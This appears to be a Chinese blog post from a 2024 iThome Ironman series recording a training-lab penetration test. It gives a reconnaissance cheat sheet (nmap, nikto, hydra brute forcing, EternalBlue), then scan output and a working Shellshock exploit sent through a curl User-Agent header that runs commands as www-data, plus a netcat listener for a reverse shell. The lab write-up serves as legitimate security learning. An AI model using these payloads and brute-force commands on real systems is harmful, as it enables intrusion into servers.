iT邦幫忙

2024 iThome 鐵人賽
DAY 24
0
佛心分享-IT 人自學之術

從0到1的攻擊手自學之旅系列 第 24

[鐵人賽] Day 24:暑期培訓(五) - /cgi-bin(shellshock)

16th鐵人賽
83 瀏覽

  • 分享至 

  • xImage
    •  

SOP

更新SOP (nikto, wpscan, dirb, msfconsole, hydra)

  • VPN連線進入靶機網域

    • sudo openvpn --config (目標).ovpn

  • rhost='目標IP'

  • nmap

    • nmap -F (目標IP)
    • 或 nmap -T4 (目標IP)
    • 或 mmap -p- (目標IP) --min-rate 5000
    • namp -Pn (目標IP Windows主機)
    • nmap -sC -sV -O -p(目標埠,隔開) (目標IP)
      • 發現23 port: telnet (目標IP)
      • 發現21 port: ftp -v (目標IP)
      • 發現139,445 port: smbclient -L (目標IP)
      • 發現6379 port: redis-cli -h (目標IP)

  • whatweb (目標IP)

  • nikto -host (目標IP)

  • wpscan --url (目標IP) -U '' -P '' --api-token '' -e ap,at,u,vp

  • Google Hacking: site:(目標IP) 關鍵字 filetype:

  • Linux:$ echo "(目標IP) xxx.htb" | sudo tee -a /etc/hosts

  • ffuf掃瞄子網域名稱

    • ffuf -u http://xxx.htb -H "Host: FUZZ.xxx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
    • SecLists 上次更新4年前的古老字典檔

  • dirb http://(目標IP)

  • 建立網路服務

    • nc -lvnp 443
    • sudo python3 -m http.server 80
    • sudo php -S 0.0.0.0:80

  • searchsploit -m POC code

  • Metasploit: msfconsole -q

  • hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt ssh://x.x.x.x

  • EternalBlue ms17-010: windows/smb/ms17_010_psexec

    • Message signing enabled but not required
    • authentication_level: user

  • Apache 2.4.49~2.4.50: CVE-2021-41773

$rhost

┌──(kali㉿kali)-[~]
└─$ rhost='172.16.x.x'

nmap -p- $rhost

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80  $rhost
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 03:42 EDT
Nmap scan report for 172.16.x.x
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 be:a6:be:09:7c:4c:94:4d:d7:74:9f:da:96:67:c0:66 (DSA)
|   2048 df:ce:56:4c:b4:63:a7:e5:4c:fc:9a:c3:9e:2e:d0:86 (RSA)
|   256 19:1c:d8:22:c8:c1:7f:c2:e2:c2:ae:8e:89:ab:5b:0d (ECDSA)
|_  256 68:4f:c8:c8:7b:35:37:ee:07:a5:6f:67:b7:15:43:9b (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)

Apache httpd 2.4.7搜尋到的Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution派不上用場。

whatweb

┌──(kali㉿kali)-[~]
└─$ whatweb $rhost
http://172.16.x.x [200 OK] Apache[2.4.7], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[172.16.x.x], Title[Apache2 Ubuntu Default Page: It works]

nikto

┌──(kali㉿kali)-[~]
└─$ nikto -host $rhost
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.16.x.x
+ Target Hostname:    172.16.x.x
+ Target Port:        80
+ Start Time:         2024-10-02 04:08:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 5e19588e4cd5f, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .

dirb

┌──(kali㉿kali)-[~]
└─$ dirb http://$rhost

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct  2 04:31:56 2024
URL_BASE: http://172.16.x.x/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.x.x/ ----
==> DIRECTORY: http://172.16.x.x/cgi-bin/
+ http://172.16.x.x/cgi-bin/ (CODE:403|SIZE:286)
+ http://172.16.x.x/index.html (CODE:200|SIZE:11510)

---- Entering directory: http://172.16.x.x/cgi-bin/ ----
+ http://172.16.x.x/cgi-bin/keygen (CODE:200|SIZE:153)

Google搜尋search cgi exploit可以找到Exploiting CGI Scripts with ShellshockCGI ShellShockxploiting a Shellshock Vulnerability。看起來可以使用Metasploit、BrupSuite、crul、Python

┌──(kali㉿kali)-[~]
└─$ curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://172.16.x.x/cgi-bin/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /cgi-bin/
on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 172.16.x.x Port 80</address>
</body></html>

┌──(kali㉿kali)-[~]
└─$ curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://172.16.x.x/cgi-bin/keygen

uid=33(www-data) gid=33(www-data) groups=33(www-data)

再來的做法就差不多,依照文章的說明確認漏洞可以利用之後把nc打開監聽,然後利用漏洞返回建立shell下指令。上課講師在這個例子提到前面的靶機都固定要我們去find文件secret.txt,跟我之前說要通靈的行為一樣完全無法理解,不過這裡解釋了為了證明能夠利用漏洞一般會執行下方的whoami&&uname -a&&id這類指令。

whoami 
uname -a 
cd /
find / -type f -name secret.txt -print 2>/dev/null

上一篇
[鐵人賽] Day 23:暑期培訓(四) - MS17-010
下一篇
[鐵人賽] Day 25:暑期培訓(六) - /OTRS
系列文
從0到1的攻擊手自學之旅30
  1. 26
    [鐵人賽] Day 26:暑期培訓(七) - /OctoberCMS
  2. 27
    [鐵人賽] Day 27:暑期培訓(八) - /FreeSWITCH
  3. 28
    [鐵人賽] Day 28:期末測驗 - A組
  4. 29
    [鐵人賽] Day 29:期末測驗 - B組
  5. 30
    [鐵人賽] Day 30:期末測驗 - 打不穿靶機從1又變成0了
完整目錄
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
1064
團體組數
40
累計文章數
22197
完賽人數
602
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js
熱門問題
熱門回答
熱門文章
IT邦幫忙